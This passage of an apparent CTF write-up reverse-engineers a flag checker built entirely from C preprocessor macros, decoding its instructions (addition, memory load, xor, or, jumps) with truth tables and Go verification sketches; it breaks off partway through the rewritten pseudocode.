<p>The part above looks like the main program, so we’ll skip it for now. Jumping all the way to the bottom (line 6217), we see that the code includes itself twice if <code class="language-plaintext highlighter-rouge">S != -1</code>. We also see the predefined macro <code class="language-plaintext highlighter-rouge">__INCLUDE_LEVEL__</code> being used. It starts at 0 in the main file and increases by 1 for each level of nested <code class="language-plaintext highlighter-rouge">#include</code>. This means the code expands differently at different include levels.</p>

<p>Overall structure of the file can be seen as:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (__INCLUDE_LEVEL__ == 0) {
  flag_str := "CTF{write_flag_here_please}"

  /* define character ascii value */
  
  MEMORY[0x0 - 0x7F] := {...}
  
  copy(&amp;MEMORY[0x80], flag_str)
}

if (__INCLUDE_LEVEL__ &gt; 12) {
  // main program
} else {
  if (S != -1) {
    #include self
  }
  if (S != -1) {
    #include self
  }
}
</code></pre></div></div>

<h2 id="reversing-the-program">Reversing the Program</h2>

<p>For the main program (line 1927 - 6215), we can see a pattern that looks like this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if S == [x]
</span>  <span class="cp">#undef S
</span>  <span class="cp">#define S [x+1]
</span>  <span class="p">[...]</span>
<span class="cp">#endif
#if S == [x+1]
</span>  <span class="cp">#undef S
</span>  <span class="cp">#define S [x+2]
</span><span class="p">[...]</span>
</code></pre></div></div>

<p>where <code class="language-plaintext highlighter-rouge">x</code> ranges from 0 to 58. Experience tells us that <code class="language-plaintext highlighter-rouge">S</code> should be the instruction pointer, which by default advances to the next instruction. However, the preprocessor only goes in one direction, so how does this program <code class="language-plaintext highlighter-rouge">jmp</code>? In other words, what happens if the program does <code class="language-plaintext highlighter-rouge">#define S [x]</code> where <code class="language-plaintext highlighter-rouge">x</code> is less than the current <code class="language-plaintext highlighter-rouge">S</code> value?</p>

<p>This is where the two <code class="language-plaintext highlighter-rouge">#include &lt;cpp.c&gt;</code> directives come into play. The code includes itself twice when <code class="language-plaintext highlighter-rouge">__INCLUDE_LEVEL__</code> is at most 12 and <code class="language-plaintext highlighter-rouge">S != -1</code>. From this we learn two things:</p>

<ol>
  <li>The program ends when the instruction pointer <code class="language-plaintext highlighter-rouge">S</code> reaches <code class="language-plaintext highlighter-rouge">-1</code>.</li>
  <li>The program performs a <em>jmp</em> by setting <code class="language-plaintext highlighter-rouge">S</code>; if the new <code class="language-plaintext highlighter-rouge">S</code> is less than the current <code class="language-plaintext highlighter-rouge">S</code>, the target instruction runs during the next <code class="language-plaintext highlighter-rouge">#include</code> of the same code.</li>
</ol>
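<p>The following toy model in Go shows why two self-includes per level are enough to emulate jumps. It assumes the structure summarized above: the body runs once <code class="language-plaintext highlighter-rouge">__INCLUDE_LEVEL__</code> exceeds 12, and otherwise the file includes itself twice while <code class="language-plaintext highlighter-rouge">S != -1</code>. The three-instruction program and the <code class="language-plaintext highlighter-rouge">machine</code> type are made up for illustration and are not part of <code class="language-plaintext highlighter-rouge">cpp.c</code>.</p>

```go
package main

import "fmt"

// machine is a toy stand-in for the preprocessor state: S is the
// instruction pointer and counter is a made-up register.
type machine struct {
	S       int
	counter int
	passes  int // how many times the program body was expanded
}

// pass models one expansion of the main program. Every "#if S == k" block
// is tested in file order, so a forward jump can run in the same pass, while
// a backward jump only takes effect in the next pass.
func (m *machine) pass() {
	m.passes++
	if m.S == 0 { // 0: counter += 1
		m.counter++
		m.S = 1
	}
	if m.S == 1 { // 1: IF counter < 5 THEN JMP 0 (a backward jump)
		if m.counter < 5 {
			m.S = 0
		} else {
			m.S = 2
		}
	}
	if m.S == 2 { // 2: EXIT
		m.S = -1
	}
}

// include models the file including itself: deeper than maxLevel the body
// runs, otherwise the file includes itself twice, each guarded by S != -1.
func (m *machine) include(level, maxLevel int) {
	if level > maxLevel {
		m.pass()
		return
	}
	if m.S != -1 {
		m.include(level+1, maxLevel)
	}
	if m.S != -1 {
		m.include(level+1, maxLevel)
	}
}

func main() {
	m := &machine{}
	m.include(0, 12)
	fmt.Println(m.counter, m.passes, m.S) // 5 5 -1
}
```

<p>Under these assumptions, each leaf of the include tree is one pass over the instruction list, so a backward jump simply costs one extra pass, and the file gets at most 2<sup>13</sup> = 8192 passes before it stops including itself.</p>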

<hr />

<p>Since the initial value of <code class="language-plaintext highlighter-rouge">S</code> is <code class="language-plaintext highlighter-rouge">0</code>, we followed the execution path and worked out by hand what each instruction means:</p>

<p><code class="language-plaintext highlighter-rouge">S == 0</code>: A single <code class="language-plaintext highlighter-rouge">#define S 24</code> means <code class="language-plaintext highlighter-rouge">JMP 24</code>.<br />
<code class="language-plaintext highlighter-rouge">S == 24</code>: What’s going on? Why are there so many <code class="language-plaintext highlighter-rouge">#undef</code>s?</p>

<h4 id="s--30">S == 30</h4>

<p>Setting the confusion aside, I followed the path all the way to <code class="language-plaintext highlighter-rouge">S == 30</code> and found a humongous body for this single instruction.</p>

<blockquote>
  <p>I originally thought this was some form of obfuscation, so I wrote a static analyzer for the program to see if I could strip some of it away. I spent a lot of time on this before realizing I was heading in the wrong direction.</p>
</blockquote>

<p>We see something like this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#ifndef Bx
</span>  <span class="cp">#ifndef Ix
</span>    <span class="cp">#ifdef c
</span>      <span class="cp">#define Bx
</span>      <span class="cp">#undef c
</span>    <span class="cp">#endif
</span>  <span class="cp">#else
</span>    <span class="cp">#ifndef c
</span>      <span class="cp">#define Bx
</span>      <span class="cp">#undef c
</span>    <span class="cp">#endif
</span>  <span class="cp">#endif
#else
</span>  <span class="cp">#ifndef Ix
</span>    <span class="cp">#ifdef c
</span>      <span class="cp">#undef Bx
</span>      <span class="cp">#define c
</span>    <span class="cp">#endif
</span>  <span class="cp">#else
</span>    <span class="cp">#ifndef c
</span>      <span class="cp">#undef Bx
</span>      <span class="cp">#define c
</span>    <span class="cp">#endif
</span>  <span class="cp">#endif
#endif
</span></code></pre></div></div>

<p>for <code class="language-plaintext highlighter-rouge">x</code> ranging from 0 to 7. Let’s make it clearer with a table:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center">Bx</th>
      <th style="text-align: center">Ix</th>
      <th style="text-align: center">c</th>
      <th style="text-align: center">Bx_after</th>
      <th style="text-align: center">c_after</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
    </tr>
    <tr>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center"><strong>Y</strong></td>
      <td style="text-align: center"><strong>N</strong></td>
    </tr>
    <tr>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center"><strong>Y</strong></td>
      <td style="text-align: center"><strong>N</strong></td>
    </tr>
    <tr>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
    </tr>
    <tr>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
    </tr>
    <tr>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center"><strong>N</strong></td>
      <td style="text-align: center"><strong>Y</strong></td>
    </tr>
    <tr>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">N</td>
      <td style="text-align: center"><strong>N</strong></td>
      <td style="text-align: center"><strong>Y</strong></td>
    </tr>
    <tr>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
      <td style="text-align: center">Y</td>
    </tr>
  </tbody>
</table>

<p>Here <code class="language-plaintext highlighter-rouge">N</code> means that the macro is undefined and <code class="language-plaintext highlighter-rouge">Y</code> means it is defined; <code class="language-plaintext highlighter-rouge">Bx_after</code> and <code class="language-plaintext highlighter-rouge">c_after</code> are the values of <code class="language-plaintext highlighter-rouge">Bx</code> and <code class="language-plaintext highlighter-rouge">c</code> after the instruction runs. The 4 rows with <strong>bold</strong> entries are the ones where the values change. All other combinations of <code class="language-plaintext highlighter-rouge">Bx</code>, <code class="language-plaintext highlighter-rouge">Ix</code> and <code class="language-plaintext highlighter-rouge">c</code> match none of the branches, so their values stay the same.</p>

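<p>It is then clear that this is the binary addition <code class="language-plaintext highlighter-rouge">B += I</code>, where <code class="language-plaintext highlighter-rouge">c</code> is the carry bit: for each <code class="language-plaintext highlighter-rouge">x</code>, the new <code class="language-plaintext highlighter-rouge">Bx</code> is the sum bit of <code class="language-plaintext highlighter-rouge">Bx + Ix + c</code> and the new <code class="language-plaintext highlighter-rouge">c</code> is its carry into the next bit. The only confusing part is how a bit is represented.</p>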
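<p>As a sanity check, the table can be transcribed into Go and compared against ordinary 8-bit addition for every pair of inputs. This is a sketch under a few assumptions: bits are stored least significant first, <code class="language-plaintext highlighter-rouge">true</code> means “macro defined”, and the carry is assumed to start out undefined. <code class="language-plaintext highlighter-rouge">addBits</code>, <code class="language-plaintext highlighter-rouge">toBits</code> and <code class="language-plaintext highlighter-rouge">fromBits</code> are names I made up.</p>

```go
package main

import "fmt"

// addBits transcribes instruction 30 (B += I). Bits are stored least
// significant first and true means "macro defined". Each iteration applies
// one row of the table to (Bx, Ix, c).
func addBits(b, i [8]bool) [8]bool {
	c := false // assumption: the carry macro c starts out undefined
	for x := 0; x < 8; x++ {
		switch {
		case !b[x] && i[x] != c: // rows N-N-Y and N-Y-N
			b[x], c = true, false
		case b[x] && i[x] != c: // rows Y-N-Y and Y-Y-N
			b[x], c = false, true
		}
		// every other row leaves Bx and c unchanged
	}
	return b
}

// toBits converts a byte into the bit-array form (least significant first).
func toBits(v uint8) (bits [8]bool) {
	for x := range bits {
		bits[x] = v&(1<<x) != 0
	}
	return bits
}

// fromBits converts the bit-array form back into a byte.
func fromBits(bits [8]bool) (v uint8) {
	for x, set := range bits {
		if set {
			v |= 1 << x
		}
	}
	return v
}

func main() {
	for b := 0; b < 256; b++ {
		for i := 0; i < 256; i++ {
			got := fromBits(addBits(toBits(uint8(b)), toBits(uint8(i))))
			if got != uint8(b)+uint8(i) {
				fmt.Println("mismatch at", b, i)
				return
			}
		}
	}
	fmt.Println("addBits agrees with 8-bit addition on all inputs")
}
```

<p>The carry out of bit 7 is simply dropped, so the addition wraps around modulo 256. This wraparound is what makes a signed reading of these registers work.</p>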

<h3 id="define-and-undef-a-bit">#define and #undef a Bit</h3>

<p>In the parts of the code we looked at first, all values are set using <code class="language-plaintext highlighter-rouge">#define [variable] [value]</code>; this applies to the <code class="language-plaintext highlighter-rouge">flag</code> value, the <code class="language-plaintext highlighter-rouge">MEM</code> section and the instruction pointer <code class="language-plaintext highlighter-rouge">S</code>. However, things change a bit in the main program. Here, a bit is set with <code class="language-plaintext highlighter-rouge">#define</code>, cleared with <code class="language-plaintext highlighter-rouge">#undef</code>, and tested with <code class="language-plaintext highlighter-rouge">#ifdef</code> or <code class="language-plaintext highlighter-rouge">#ifndef</code>: whether the macro exists determines whether the bit is 1 or 0. So, for a code snippet like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define B0
#undef  B1
#define B2
#undef  B3
#undef  B4
#define B5
#define B6
#define B7
</code></pre></div></div>

<p>If we treat <code class="language-plaintext highlighter-rouge">B</code> as a signed 8-bit number with <code class="language-plaintext highlighter-rouge">B0</code> as the least significant bit, it is equivalent to setting <code class="language-plaintext highlighter-rouge">B = 0b11100101 (-27)</code>.</p>
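<p>The decoding rule can be captured in a small Go helper that reads a run of <code class="language-plaintext highlighter-rouge">#define</code>/<code class="language-plaintext highlighter-rouge">#undef</code> lines for one register. <code class="language-plaintext highlighter-rouge">decodeRegister</code> is a hypothetical name, and the helper only understands the bare <code class="language-plaintext highlighter-rouge">#define Rx</code> / <code class="language-plaintext highlighter-rouge">#undef Rx</code> form shown above.</p>

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// decodeRegister reads "#define Rx" / "#undef Rx" lines for register reg
// and returns its value as a signed 8-bit number: bit x is 1 when the last
// directive for Rx is #define, and x = 0 is the least significant bit.
func decodeRegister(src, reg string) int8 {
	var v uint8
	for _, line := range strings.Split(src, "\n") {
		f := strings.Fields(line)
		if len(f) != 2 || !strings.HasPrefix(f[1], reg) {
			continue // skip anything that is not a bare #define/#undef
		}
		bit, err := strconv.Atoi(strings.TrimPrefix(f[1], reg))
		if err != nil || bit < 0 || bit > 7 {
			continue
		}
		switch f[0] {
		case "#define":
			v |= 1 << bit
		case "#undef":
			v &^= 1 << bit
		}
	}
	return int8(v) // reinterpret the 8 bits as two's complement
}

func main() {
	src := `#define B0
#undef  B1
#define B2
#undef  B3
#undef  B4
#define B5
#define B6
#define B7`
	fmt.Println(decodeRegister(src, "B")) // -27
}
```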

<p>With this knowledge, we can finally start our reversing process.</p>

<hr />

<p>Continuing where we left off:</p>

<p>24: <code class="language-plaintext highlighter-rouge">I = 0</code><br />
25: <code class="language-plaintext highlighter-rouge">M = 0</code><br />
26: <code class="language-plaintext highlighter-rouge">N = 1</code><br />
27: <code class="language-plaintext highlighter-rouge">P = 0</code><br />
28: <code class="language-plaintext highlighter-rouge">Q = 0</code><br />
29: <code class="language-plaintext highlighter-rouge">B = -27</code><br />
30: <code class="language-plaintext highlighter-rouge">B += I</code> as we just analyzed.</p>

<h4 id="s--31">S == 31</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ifndef B0
  #ifndef B1
    #ifndef B2
      #ifndef B3
        #ifndef B4
          #ifndef B5
            #ifndef B6
              #ifndef B7
                #undef S
                #define S 56
              #endif
            #endif
          #endif
        #endif
      #endif
    #endif
  #endif
#endif
</code></pre></div></div>

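<p>Each nested <code class="language-plaintext highlighter-rouge">#ifndef</code> requires one bit of <code class="language-plaintext highlighter-rouge">B</code> to be undefined, so by our analysis above the jump to instruction 56 happens only when all eight bits are 0, i.e. when <code class="language-plaintext highlighter-rouge">B == 0</code>.</p>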

<p>Therefore, instruction 31 is <code class="language-plaintext highlighter-rouge">IF B == 0 THEN JMP 56</code>.</p>

<hr />

<p>32: <code class="language-plaintext highlighter-rouge">B = 0x80</code><br />
33: <code class="language-plaintext highlighter-rouge">B += I</code>, same as instruction 30</p>

<h4 id="s--34">S == 34</h4>

<p>There are two parts to this instruction; let’s go through them one by one:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#undef lx
#ifdef Bx
  #define lx 1
#else
  #define lx 0
#endif
</code></pre></div></div>

<p>for <code class="language-plaintext highlighter-rouge">x</code> ranging from 0 to 7. This checks each bit of <code class="language-plaintext highlighter-rouge">B</code> and sets <code class="language-plaintext highlighter-rouge">lx</code> to the literal value 1 or 0 accordingly.</p>

<p>The next part looks like this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if LD(l, x)
</span>  <span class="cp">#define Ax
#else
</span>  <span class="cp">#undef Ax
#endif
</span></code></pre></div></div>

<p>for <code class="language-plaintext highlighter-rouge">x</code> ranging from 0 to 7. As we have analyzed before, <code class="language-plaintext highlighter-rouge">LD(l, x)</code> is the function-like macro that loads bit <code class="language-plaintext highlighter-rouge">x</code> of the <code class="language-plaintext highlighter-rouge">MEM</code> byte at the address given by <code class="language-plaintext highlighter-rouge">l</code>. The <code class="language-plaintext highlighter-rouge">#if</code> converts the literal 0 or 1 stored in memory back to the bit representation (defined or undefined) used by the program.</p>

<p>Taken together, this is a memory load: it uses <code class="language-plaintext highlighter-rouge">B</code> as a memory address and stores the value found there in <code class="language-plaintext highlighter-rouge">A</code>. Therefore, instruction 34 is <code class="language-plaintext highlighter-rouge">A = LOAD(B)</code>.</p>
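<p>Here is a minimal Go model of the two halves of instruction 34. The memory layout is an assumption made for illustration: <code class="language-plaintext highlighter-rouge">bitMemory</code> stores, for every address, the literal 0 or 1 that <code class="language-plaintext highlighter-rouge">LD(l, x)</code> is assumed to yield for bit <code class="language-plaintext highlighter-rouge">x</code>. The real macro layout in <code class="language-plaintext highlighter-rouge">cpp.c</code> may differ, and <code class="language-plaintext highlighter-rouge">load</code> is a made-up name.</p>

```go
package main

import "fmt"

// bitMemory is a hypothetical model of MEM: mem[addr][x] is the literal 0
// or 1 that LD(l, x) is assumed to yield for bit x of the byte at addr.
type bitMemory [256][8]int

// load transcribes instruction 34, A = LOAD(B).
func load(mem *bitMemory, b [8]bool) (a [8]bool) {
	// Part 1 ("#ifdef Bx / #define lx 1 / #else / #define lx 0"):
	// turn the defined/undefined bits of B into a numeric address.
	addr := 0
	for x, set := range b {
		if set {
			addr |= 1 << x
		}
	}
	// Part 2 ("#if LD(l, x) / #define Ax / #else / #undef Ax"):
	// turn each literal memory bit back into defined/undefined.
	for x := range a {
		a[x] = mem[addr][x] == 1
	}
	return a
}

func main() {
	var mem bitMemory
	mem[0x81] = [8]int{1, 0, 0, 0, 0, 0, 1, 0}                          // 'A' (0x41), LSB first
	b := [8]bool{true, false, false, false, false, false, false, true} // B = 0x81
	fmt.Println(load(&mem, b))
}
```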

<hr />

<p>35: <code class="language-plaintext highlighter-rouge">B = LOAD(I)</code>, similar to instruction 34.<br />
36: <code class="language-plaintext highlighter-rouge">R = 1</code><br />
37: <code class="language-plaintext highlighter-rouge">JMP 12</code></p>

<p>12: <code class="language-plaintext highlighter-rouge">X = 1</code><br />
13: <code class="language-plaintext highlighter-rouge">Y = 0</code><br />
14: <code class="language-plaintext highlighter-rouge">IF X == 0 THEN JMP 22</code>, similar to instruction 31.</p>

<h4 id="s--15">S == 15</h4>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#ifdef Xx
</span>  <span class="cp">#define Zx
#else
</span>  <span class="cp">#undef Zx
#endif
</span></code></pre></div></div>

<p>for <code class="language-plaintext highlighter-rouge">x</code> ranging from 0 to 7. This simply <em>copies</em> each bit of <code class="language-plaintext highlighter-rouge">X</code> into <code class="language-plaintext highlighter-rouge">Z</code>, so it is an assignment: instruction 15 is <code class="language-plaintext highlighter-rouge">Z = X</code>.</p>

<h4 id="s--16">S == 16</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ifdef Zx
  #ifndef Bx
    #undef Zx
  #endif
#endif
</code></pre></div></div>

<p>for <code class="language-plaintext highlighter-rouge">x</code> ranging from 0 to 7. From its structure, we can see that <code class="language-plaintext highlighter-rouge">Zx</code> is cleared when <code class="language-plaintext highlighter-rouge">Bx</code> is 0 and otherwise left unchanged.</p>

<blockquote>
  <p>You can draw out a table for this, but I’ll cut to the chase…</p>
</blockquote>

<p>This means the instruction is a bitwise-and, <code class="language-plaintext highlighter-rouge">Z = Z &amp; B</code>.</p>

<hr />

<p>17: <code class="language-plaintext highlighter-rouge">IF Z == 0 THEN JMP 19</code><br />
18: <code class="language-plaintext highlighter-rouge">Y += A</code><br />
19: <code class="language-plaintext highlighter-rouge">X += X</code><br />
20: <code class="language-plaintext highlighter-rouge">A += A</code><br />
21: <code class="language-plaintext highlighter-rouge">JMP 14</code></p>

<p>22: <code class="language-plaintext highlighter-rouge">A = Y</code><br />
23: <code class="language-plaintext highlighter-rouge">JMP 1</code></p>
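<p>Instructions 12 to 22 form a loop. As far as I can tell it is the classic shift-and-add multiplication. <code class="language-plaintext highlighter-rouge">X</code> is a one-hot mask that walks over the bits of <code class="language-plaintext highlighter-rouge">B</code>, <code class="language-plaintext highlighter-rouge">A</code> doubles every round, and <code class="language-plaintext highlighter-rouge">Y</code> accumulates <code class="language-plaintext highlighter-rouge">A</code> whenever the current bit of <code class="language-plaintext highlighter-rouge">B</code> is set. With 8-bit wraparound it should therefore leave <code class="language-plaintext highlighter-rouge">A * B mod 256</code> in <code class="language-plaintext highlighter-rouge">Y</code>. The Go sketch below transcribes the loop and checks that claim exhaustively; the name <code class="language-plaintext highlighter-rouge">mulLoop</code> is mine.</p>

```go
package main

import "fmt"

// mulLoop transcribes instructions 12-22: x is a one-hot mask that walks
// over the bits of b, a doubles every round, and y accumulates a whenever
// the current bit of b is set. All arithmetic wraps at 8 bits.
func mulLoop(a, b uint8) uint8 {
	x, y := uint8(1), uint8(0) // 12, 13
	for x != 0 {               // 14: exits once x has been shifted out
		if x&b != 0 { // 15-17: Z = X & B
			y += a // 18
		}
		x += x // 19: X <<= 1
		a += a // 20: A <<= 1
	}
	return y // 22: A = Y
}

func main() {
	for a := 0; a < 256; a++ {
		for b := 0; b < 256; b++ {
			if mulLoop(uint8(a), uint8(b)) != uint8(a)*uint8(b) {
				fmt.Println("mismatch at", a, b)
				return
			}
		}
	}
	fmt.Println("mulLoop(a, b) == a*b (mod 256) for all 8-bit inputs")
}
```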

<h4 id="s--1">S == 1</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ifdef Rx
  #undef Rx
#else
  #define Rx
#endif
</code></pre></div></div>

<p>This one should be pretty obvious: it is a bitwise-not, <code class="language-plaintext highlighter-rouge">R = ~R</code>.</p>

<hr />

<p>2: <code class="language-plaintext highlighter-rouge">Z = 1</code><br />
3: <code class="language-plaintext highlighter-rouge">R += Z</code><br />
4: <code class="language-plaintext highlighter-rouge">R += Z</code><br />
5: <code class="language-plaintext highlighter-rouge">IF R == 0 THEN JMP 38</code><br />
6: <code class="language-plaintext highlighter-rouge">R += Z</code><br />
7: <code class="language-plaintext highlighter-rouge">IF R == 0 THEN JMP 59</code><br />
8: <code class="language-plaintext highlighter-rouge">R += Z</code><br />
9: <code class="language-plaintext highlighter-rouge">IF R == 0 THEN JMP 59</code><br />
10: <code class="language-plaintext highlighter-rouge">#ERROR BUG</code><br />
11: <code class="language-plaintext highlighter-rouge">EXIT</code>, since, as discussed, <code class="language-plaintext highlighter-rouge">S == -1</code> ends the program.</p>
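<p>One way to read instructions 1 to 11 (my interpretation, not something the challenge states) is as a return dispatch. <code class="language-plaintext highlighter-rouge">R</code> tells the code that starts at 12 where to continue: <code class="language-plaintext highlighter-rouge">R = 1</code> (set at instruction 36) leads to 38, and <code class="language-plaintext highlighter-rouge">R = 2</code> or <code class="language-plaintext highlighter-rouge">3</code> leads to 59. The Go transcription below makes the 8-bit arithmetic explicit; <code class="language-plaintext highlighter-rouge">returnTarget</code> is a made-up name.</p>

```go
package main

import (
	"errors"
	"fmt"
)

// returnTarget transcribes instructions 1-11 with 8-bit wraparound and
// reports which instruction the program continues at for a given R.
func returnTarget(r uint8) (int, error) {
	r = ^r            // 1: R = ~R
	const z uint8 = 1 // 2: Z = 1
	r += z            // 3
	r += z            // 4
	if r == 0 {       // 5: true only when R was 1
		return 38, nil
	}
	r += z      // 6
	if r == 0 { // 7: true only when R was 2
		return 59, nil
	}
	r += z      // 8
	if r == 0 { // 9: true only when R was 3
		return 59, nil
	}
	return 0, errors.New("BUG") // 10: #ERROR BUG
}

func main() {
	for r := uint8(0); r < 5; r++ {
		target, err := returnTarget(r)
		fmt.Println(r, target, err)
	}
}
```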

<p>38: <code class="language-plaintext highlighter-rouge">O = M</code><br />
39: <code class="language-plaintext highlighter-rouge">O += N</code><br />
40: <code class="language-plaintext highlighter-rouge">M = N</code><br />
41: <code class="language-plaintext highlighter-rouge">N = O</code><br />
42: <code class="language-plaintext highlighter-rouge">A += M</code><br />
43: <code class="language-plaintext highlighter-rouge">B = 0x20</code><br />
44: <code class="language-plaintext highlighter-rouge">B += I</code><br />
45: <code class="language-plaintext highlighter-rouge">C = LOAD(B)</code></p>

<h4 id="s--46">S == 46</h4>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#ifdef Cx
</span>  <span class="cp">#ifdef Ax
</span>    <span class="cp">#undef Ax
</span>  <span class="cp">#else
</span>    <span class="cp">#define Ax
</span>  <span class="cp">#endif
#endif
</span></code></pre></div></div>

<p>Let’s draw a table for this:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center">Cx</th>
      <th style="text-align: center">Ax</th>
      <th style="text-align: center">Ax_after</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center">0</td>
      <td style="text-align: center">0</td>
      <td style="text-align: center">0</td>
    </tr>
    <tr>
      <td style="text-align: center">0</td>
      <td style="text-align: center">1</td>
      <td style="text-align: center">1</td>
    </tr>
    <tr>
      <td style="text-align: center">1</td>
      <td style="text-align: center">0</td>
      <td style="text-align: center"><strong>1</strong></td>
    </tr>
    <tr>
      <td style="text-align: center">1</td>
      <td style="text-align: center">1</td>
      <td style="text-align: center"><strong>0</strong></td>
    </tr>
  </tbody>
</table>

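<p>In other words, when <code class="language-plaintext highlighter-rouge">Cx</code> is not set, <code class="language-plaintext highlighter-rouge">Ax</code> stays unchanged, and when <code class="language-plaintext highlighter-rouge">Cx</code> is set, <code class="language-plaintext highlighter-rouge">Ax</code> is flipped. So we can say that</p>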

\[A_x = \begin{cases}
      A_x &amp; \text{if}\ C_x=0 \\
      \neg A_x &amp; \text{if}\ C_x=1 \\
    \end{cases} \implies A_x = A_x \oplus C_x\]

<p>This means instruction 46 is an exclusive-or, <code class="language-plaintext highlighter-rouge">A ^= C</code>.</p>

<hr />

<p>47: <code class="language-plaintext highlighter-rouge">P += A</code><br />
48: <code class="language-plaintext highlighter-rouge">B = 0x40</code><br />
49: <code class="language-plaintext highlighter-rouge">B += I</code><br />
50: <code class="language-plaintext highlighter-rouge">A = LOAD(B)</code><br />
51: <code class="language-plaintext highlighter-rouge">A ^= P</code>, similar to instruction 46</p>

<h4 id="s--52">S == 52</h4>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#ifndef Qx
</span>  <span class="cp">#ifdef Ax
</span>    <span class="cp">#define Qx
</span>  <span class="cp">#endif
#endif
</span></code></pre></div></div>

<p>Very similar to instruction 16, but this time <code class="language-plaintext highlighter-rouge">Qx</code> is set to 1 when <code class="language-plaintext highlighter-rouge">Ax</code> is 1 and otherwise left unchanged.</p>

<blockquote>
  <p>Again, you can draw a table for this.</p>
</blockquote>

<p>This means the instruction is a bitwise-or, <code class="language-plaintext highlighter-rouge">Q = Q | A</code>.</p>
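<p>Each of instructions 16, 46 and 52 treats every bit independently, so checking a single bit is enough to confirm the three readings. The sketch below transcribes each <code class="language-plaintext highlighter-rouge">#ifdef</code> pattern for one bit, with <code class="language-plaintext highlighter-rouge">true</code> meaning “macro defined”. It then compares the results with Go’s boolean and, not-equal (exclusive-or) and or. The function names are made up.</p>

```go
package main

import "fmt"

// s16 transcribes S == 16: "#ifdef Zx / #ifndef Bx / #undef Zx".
func s16(z, b bool) bool {
	if z && !b {
		z = false
	}
	return z
}

// s46 transcribes S == 46: "#ifdef Cx" toggles Ax.
func s46(a, c bool) bool {
	if c {
		a = !a
	}
	return a
}

// s52 transcribes S == 52: "#ifndef Qx / #ifdef Ax / #define Qx".
func s52(q, a bool) bool {
	if !q && a {
		q = true
	}
	return q
}

func main() {
	for _, p := range []bool{false, true} {
		for _, q := range []bool{false, true} {
			fmt.Printf("p=%v q=%v and:%v xor:%v or:%v\n", p, q,
				s16(p, q) == (p && q),
				s46(p, q) == (p != q),
				s52(p, q) == (p || q))
		}
	}
}
```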

<hr />

<p>53: <code class="language-plaintext highlighter-rouge">A = 1</code><br />
54: <code class="language-plaintext highlighter-rouge">I += A</code><br />
55: <code class="language-plaintext highlighter-rouge">JMP 29</code></p>

<p>56: <code class="language-plaintext highlighter-rouge">IF Q == 0 THEN JMP 58</code><br />
57: <code class="language-plaintext highlighter-rouge">#ERROR "INVALID FLAG"</code><br />
58: <code class="language-plaintext highlighter-rouge">EXIT</code></p>

<h3 id="rewrite-the-program">Rewrite the Program</h3>

<p>Now that we have analyzed every instruction of the program, let’s write the whole thing as pseudocode:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">I</span> <span class="o">=</span> <span class="mi">0</span>                   <span class="c1">// 24</span>
<span class="n">M</span> <span class="o">=</span> <span class="mi">0</span>                   <span class="c1">// 25</span>
<span class="n">N</span> <span class="o">=</span> <span class="mi">1</span>                   <span class="c1">// 26</span>
<span class="n">P</span> <span class="o">=</span> <span class="mi">0</span>                   <span class="c1">// 27</span>
<span class="n">Q</span> <span class="o">=</span> <span class="mi">0</span>                   <span class="c1">// 28</span>

<span class="k">for</span> <span class="p">{</span>
  <span class="n">B</span> <span class="o">=</span> <span class="o">-</span><span class="mi">27</span>               <span class="c1">// 29</span>
  <span class="n">B</span> <span class="o">=</span> <span class="n">B</span> <span class="o">+</span> <span class="n">I</span>             <span class="c1">// 30</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">B</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>    <span class="c1">// 31</span>
  <span class="n">B</span> <span class="o">=</span> <span class="mh">0x80</span>              <span class="c1">// 32</span>
  <span class="n">B</span> <span class="o">=</span> <span class="n">B</span> <span class="o">+</span> <span class="n">I</span>             <span class="c1">// 33</span>
  <span class="n">A</span> <span class="o">=</span> <span class="n">LOAD</span><span class="p">(</span><span class="n">B</span><span class="p">)</span>           <span class="c1">// 34</span>
  <span class="n">B</span> <span class="o">=</span> <span class="n">LOAD</span><span class="p">(</span><span class="n">I</span><span class="p">)</span>           <span class="c1">// 35</span>
  <span class="n">R</span> <span class="o">=</span> <span class="mi">1</span>                 <span class="c1">// 36</span>

  <span class="n">X</span> <span class="o">=</span> <span class="mi">1</span>                 <span class="c1">// 12</span>
